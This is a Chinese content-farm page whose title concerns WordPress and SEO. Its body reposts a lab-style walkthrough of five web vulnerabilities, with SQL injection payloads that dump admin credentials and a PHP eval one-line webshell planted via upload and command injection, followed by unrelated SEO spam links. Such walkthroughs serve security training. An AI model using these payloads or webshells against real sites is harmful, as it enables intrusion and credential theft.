当前位置: 首页 > news >正文

wordpress调用相关评论宝鸡百度seo

wordpress调用相关评论,宝鸡百度seo,做营销型网站用那个cms好,网站 banner 尺寸寻找漏洞 一,我们打开页面 第一个漏洞 xss漏洞 1.在登录页面显示有弹窗 第二个漏洞 sql注入漏洞 1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名 -1 union select 1,database(),3# 3.查看表名 -1 union select 1,2,group…

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.15wanjia.com/news/49318.html

相关文章:

  • 网站宣传方案网络推广和运营的区别
  • 企业网站备案 网站服务内容seo优化轻松seo优化排名
  • 网页制做郑州seo关键词排名优化
  • 郴州网站开发av手机在线精品
  • 闸北区网站制作北京百度竞价
  • 免费弄空间的网站怎样精准搜索关键词
  • 商丘企业网站服务seo外包公司多吗
  • 柳州做网站的企业平台营销
  • 成都网站建设时代汇创搜索引擎优化网站排名
  • 做网站建设价格百度如何收录网站
  • 网站初期seo怎么做网站关键词查询网址
  • 网站建设顾问不付费免费网站
  • wordpress页面标题在线排名优化
  • 晋城市企业网站百度有专做优化的没
  • 公司做网站买域名之后做什么黑龙江seo关键词优化工具
  • 兰州新区装修公司哪家好seo软件简单易排名稳定
  • 九州娱乐官方网站怎么做代理seo技术分享免费咨询
  • 武汉做网站jw100网销平台排名
  • 好的网站设计机构在线生成网站
  • 武汉做网站 古凡网站seo优化是什么
  • wordpress 在线预约插件网站怎么优化搜索
  • 网站子网页怎么做发帖推广百度首页
  • 番禺区疫情最新消息汕头seo不错
  • kkday是哪里做的网站如何用百度平台营销
  • 酒店网站开发方案域名状态查询工具
  • 营销型网站建设步骤怎么让百度快速收录网站
  • 那个网站做推广比较好pc端网页设计公司
  • 网站建设常见问题及解决办法百度网站入口链接
  • 网站做自签发证书今日新闻联播主要内容
  • 班级网站首页设计自媒体发布软件app